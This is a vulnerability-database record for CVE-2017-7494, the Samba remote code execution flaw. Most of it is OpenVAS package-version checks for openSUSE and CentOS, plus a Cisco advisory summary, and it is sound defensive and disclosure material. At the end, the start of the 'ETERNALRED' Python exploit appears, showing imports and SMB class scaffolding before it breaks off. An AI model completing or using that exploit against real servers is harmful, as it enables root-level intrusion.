res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-test-debuginfo\", rpm:\"samba-test-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-test-devel\", rpm:\"samba-test-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc0-32bit\", rpm:\"libdcerpc-atsvc0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc0-debuginfo-32bit\", rpm:\"libdcerpc-atsvc0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-binding0-32bit\", rpm:\"libdcerpc-binding0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo-32bit\", rpm:\"libdcerpc-binding0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr0-32bit\", rpm:\"libdcerpc-samr0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr0-debuginfo-32bit\", rpm:\"libdcerpc-samr0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc0-32bit\", rpm:\"libdcerpc0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc0-debuginfo-32bit\", rpm:\"libdcerpc0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec0-32bit\", rpm:\"libgensec0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec0-debuginfo-32bit\", rpm:\"libgensec0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac0-32bit\", rpm:\"libndr-krb5pac0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo-32bit\", rpm:\"libndr-krb5pac0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt0-32bit\", rpm:\"libndr-nbt0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo-32bit\", rpm:\"libndr-nbt0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard0-32bit\", rpm:\"libndr-standard0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard0-debuginfo-32bit\", rpm:\"libndr-standard0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr0-32bit\", rpm:\"libndr0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr0-debuginfo-32bit\", rpm:\"libndr0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0-32bit\", rpm:\"libnetapi0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0-debuginfo-32bit\", rpm:\"libnetapi0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry0-32bit\", rpm:\"libregistry0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry0-debuginfo-32bit\", rpm:\"libregistry0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials0-32bit\", rpm:\"libsamba-credentials0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo-32bit\", rpm:\"libsamba-credentials0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-hostconfig0-32bit\", rpm:\"libsamba-hostconfig0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo-32bit\", rpm:\"libsamba-hostconfig0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb0-32bit\", rpm:\"libsamba-passdb0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb0-debuginfo-32bit\", rpm:\"libsamba-passdb0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy0-32bit\", rpm:\"libsamba-policy0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy0-debuginfo-32bit\", rpm:\"libsamba-policy0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util0-32bit\", rpm:\"libsamba-util0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util0-debuginfo-32bit\", rpm:\"libsamba-util0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb0-32bit\", rpm:\"libsamdb0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb0-debuginfo-32bit\", rpm:\"libsamdb0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw0-32bit\", rpm:\"libsmbclient-raw0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo-32bit\", rpm:\"libsmbclient-raw0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf0-32bit\", rpm:\"libsmbconf0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf0-debuginfo-32bit\", rpm:\"libsmbconf0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap0-32bit\", rpm:\"libsmbldap0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap0-debuginfo-32bit\", rpm:\"libsmbldap0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util0-32bit\", rpm:\"libtevent-util0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util0-debuginfo-32bit\", rpm:\"libtevent-util0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-libs-32bit\", rpm:\"samba-libs-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-libs-debuginfo-32bit\", rpm:\"samba-libs-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "Check the version of samba4", "modified": "2019-03-08T00:00:00", "published": "2017-05-26T00:00:00", "id": "OPENVAS:1361412562310882724", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882724", "type": "openvas", "title": "CentOS Update for samba4 CESA-2017:1271 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba4 CESA-2017:1271 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882724\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-26 06:32:10 +0200 (Fri, 26 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for samba4 CESA-2017:1271 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of samba4\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\n the Server Message Block (SMB) or Common Internet File System (CIFS) protocol,\n which allows PC-compatible machines to share files, printers, and other\n information. Security Fix(es): * A remote code execution flaw was found in\n Samba. A malicious authenticated samba client, having write access to the samba\n share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n Red Hat would like to thank the Samba project for reporting this issue. Upstream\n acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"samba4 on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:1271\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-May/022418.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.2.10~10.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "Check the version of ctdb", "modified": "2019-03-08T00:00:00", "published": "2017-05-26T00:00:00", "id": "OPENVAS:1361412562310882723", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882723", "type": "openvas", "title": "CentOS Update for ctdb CESA-2017:1270 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ctdb CESA-2017:1270 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882723\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-26 06:32:07 +0200 (Fri, 26 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for ctdb CESA-2017:1270 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of ctdb\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\n the Server Message Block (SMB) protocol and the related Common Internet File\n System (CIFS) protocol, which allow PC-compatible machines to share files,\n printers, and various information. Security Fix(es): * A remote code execution\n flaw was found in Samba. A malicious authenticated samba client, having write\n access to the samba share, could use this flaw to execute arbitrary code as\n root. (CVE-2017-7494) Red Hat would like to thank the Samba project for\n reporting this issue. Upstream acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"ctdb on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:1270\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-May/022420.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ctdb\", rpm:\"ctdb~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ctdb-tests\", rpm:\"ctdb-tests~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient\", rpm:\"libwbclient~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-libs\", rpm:\"samba-client-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common-libs\", rpm:\"samba-common-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common-tools\", rpm:\"samba-common-tools~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-dc\", rpm:\"samba-dc~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-dc-libs\", rpm:\"samba-dc-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb5-printing\", rpm:\"samba-krb5-printing~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-pidl\", rpm:\"samba-pidl~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-python\", rpm:\"samba-python~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-test\", rpm:\"samba-test~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-test-libs\", rpm:\"samba-test-libs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-vfs-glusterfs\", rpm:\"samba-vfs-glusterfs~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-modules\", rpm:\"samba-winbind-modules~4.4.4~14.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2019-05-29T15:32:20", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "A vulnerability in Samba could allow an authenticated, remote attacker to execute arbitrary code.\n\nThe vulnerability is due to insufficient validation of user-supplied input by the affected software. An attacker who has access to a writable share on a targeted system could upload malicious, shared libraries to the writable share. When the targeted system loads and execute the malicious, shared libraries, the attacker could execute arbitrary code, which could be used to conduct further attacks.\n\nOn May 24, 2017, the Samba team disclosed a vulnerability in Samba server software that could allow an authenticated attacker to execute arbitrary code remotely on a targeted system.\n\nThis vulnerability has been assigned CVE ID CVE-2017-7494\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170530-samba [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170530-samba\"]", "modified": "2017-07-11T13:47:34", "published": "2017-05-30T19:30:00", "id": "CISCO-SA-20170530-SAMBA", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170530-samba", "type": "cisco", "title": "Vulnerability in Samba Affecting Cisco Products: May 2017", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-05-25T20:39:53", "description": "Samba 3.5.0 - Remote Code Execution. CVE-2017-7494. Remote exploit for Linux platform", "published": "2017-05-24T00:00:00", "type": "exploitdb", "title": "Samba 3.5.0 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-24T00:00:00", "id": "EDB-ID:42060", "href": "https://www.exploit-db.com/exploits/42060/", "sourceData": "#! /usr/bin/env python\r\n# Title : ETERNALRED \r\n# Date: 05/24/2017\r\n# Exploit Author: steelo <knownsteelo@gmail.com>\r\n# Vendor Homepage: https://www.samba.org\r\n# Samba 3.5.0 - 4.5.4/4.5.10/4.4.14\r\n# CVE-2017-7494\r\n\r\n\r\nimport argparse\r\nimport os.path\r\nimport sys\r\nimport tempfile\r\nimport time\r\nfrom smb.SMBConnection import SMBConnection\r\nfrom smb import smb_structs\r\nfrom smb.base import _PendingRequest\r\nfrom smb.smb2_structs import *\r\nfrom smb.base import *\r\n\r\n\r\nclass SharedDevice2(SharedDevice):\r\n def __init__(self, type, name, comments, path, password):\r\n super().__init__(type, name, comments)\r\n self.path = path\r\n self.password = password\r\n\r\nclass SMBConnectionEx(SMBConnection):\r\n def __init__(self, username, password, my_name, remote_name, domain=\"\", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False):\r\n super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp)\r\n\r\n\r\n def hook_listShares(self):\r\n self._listShares = self.listSharesEx\r\n\r\n def 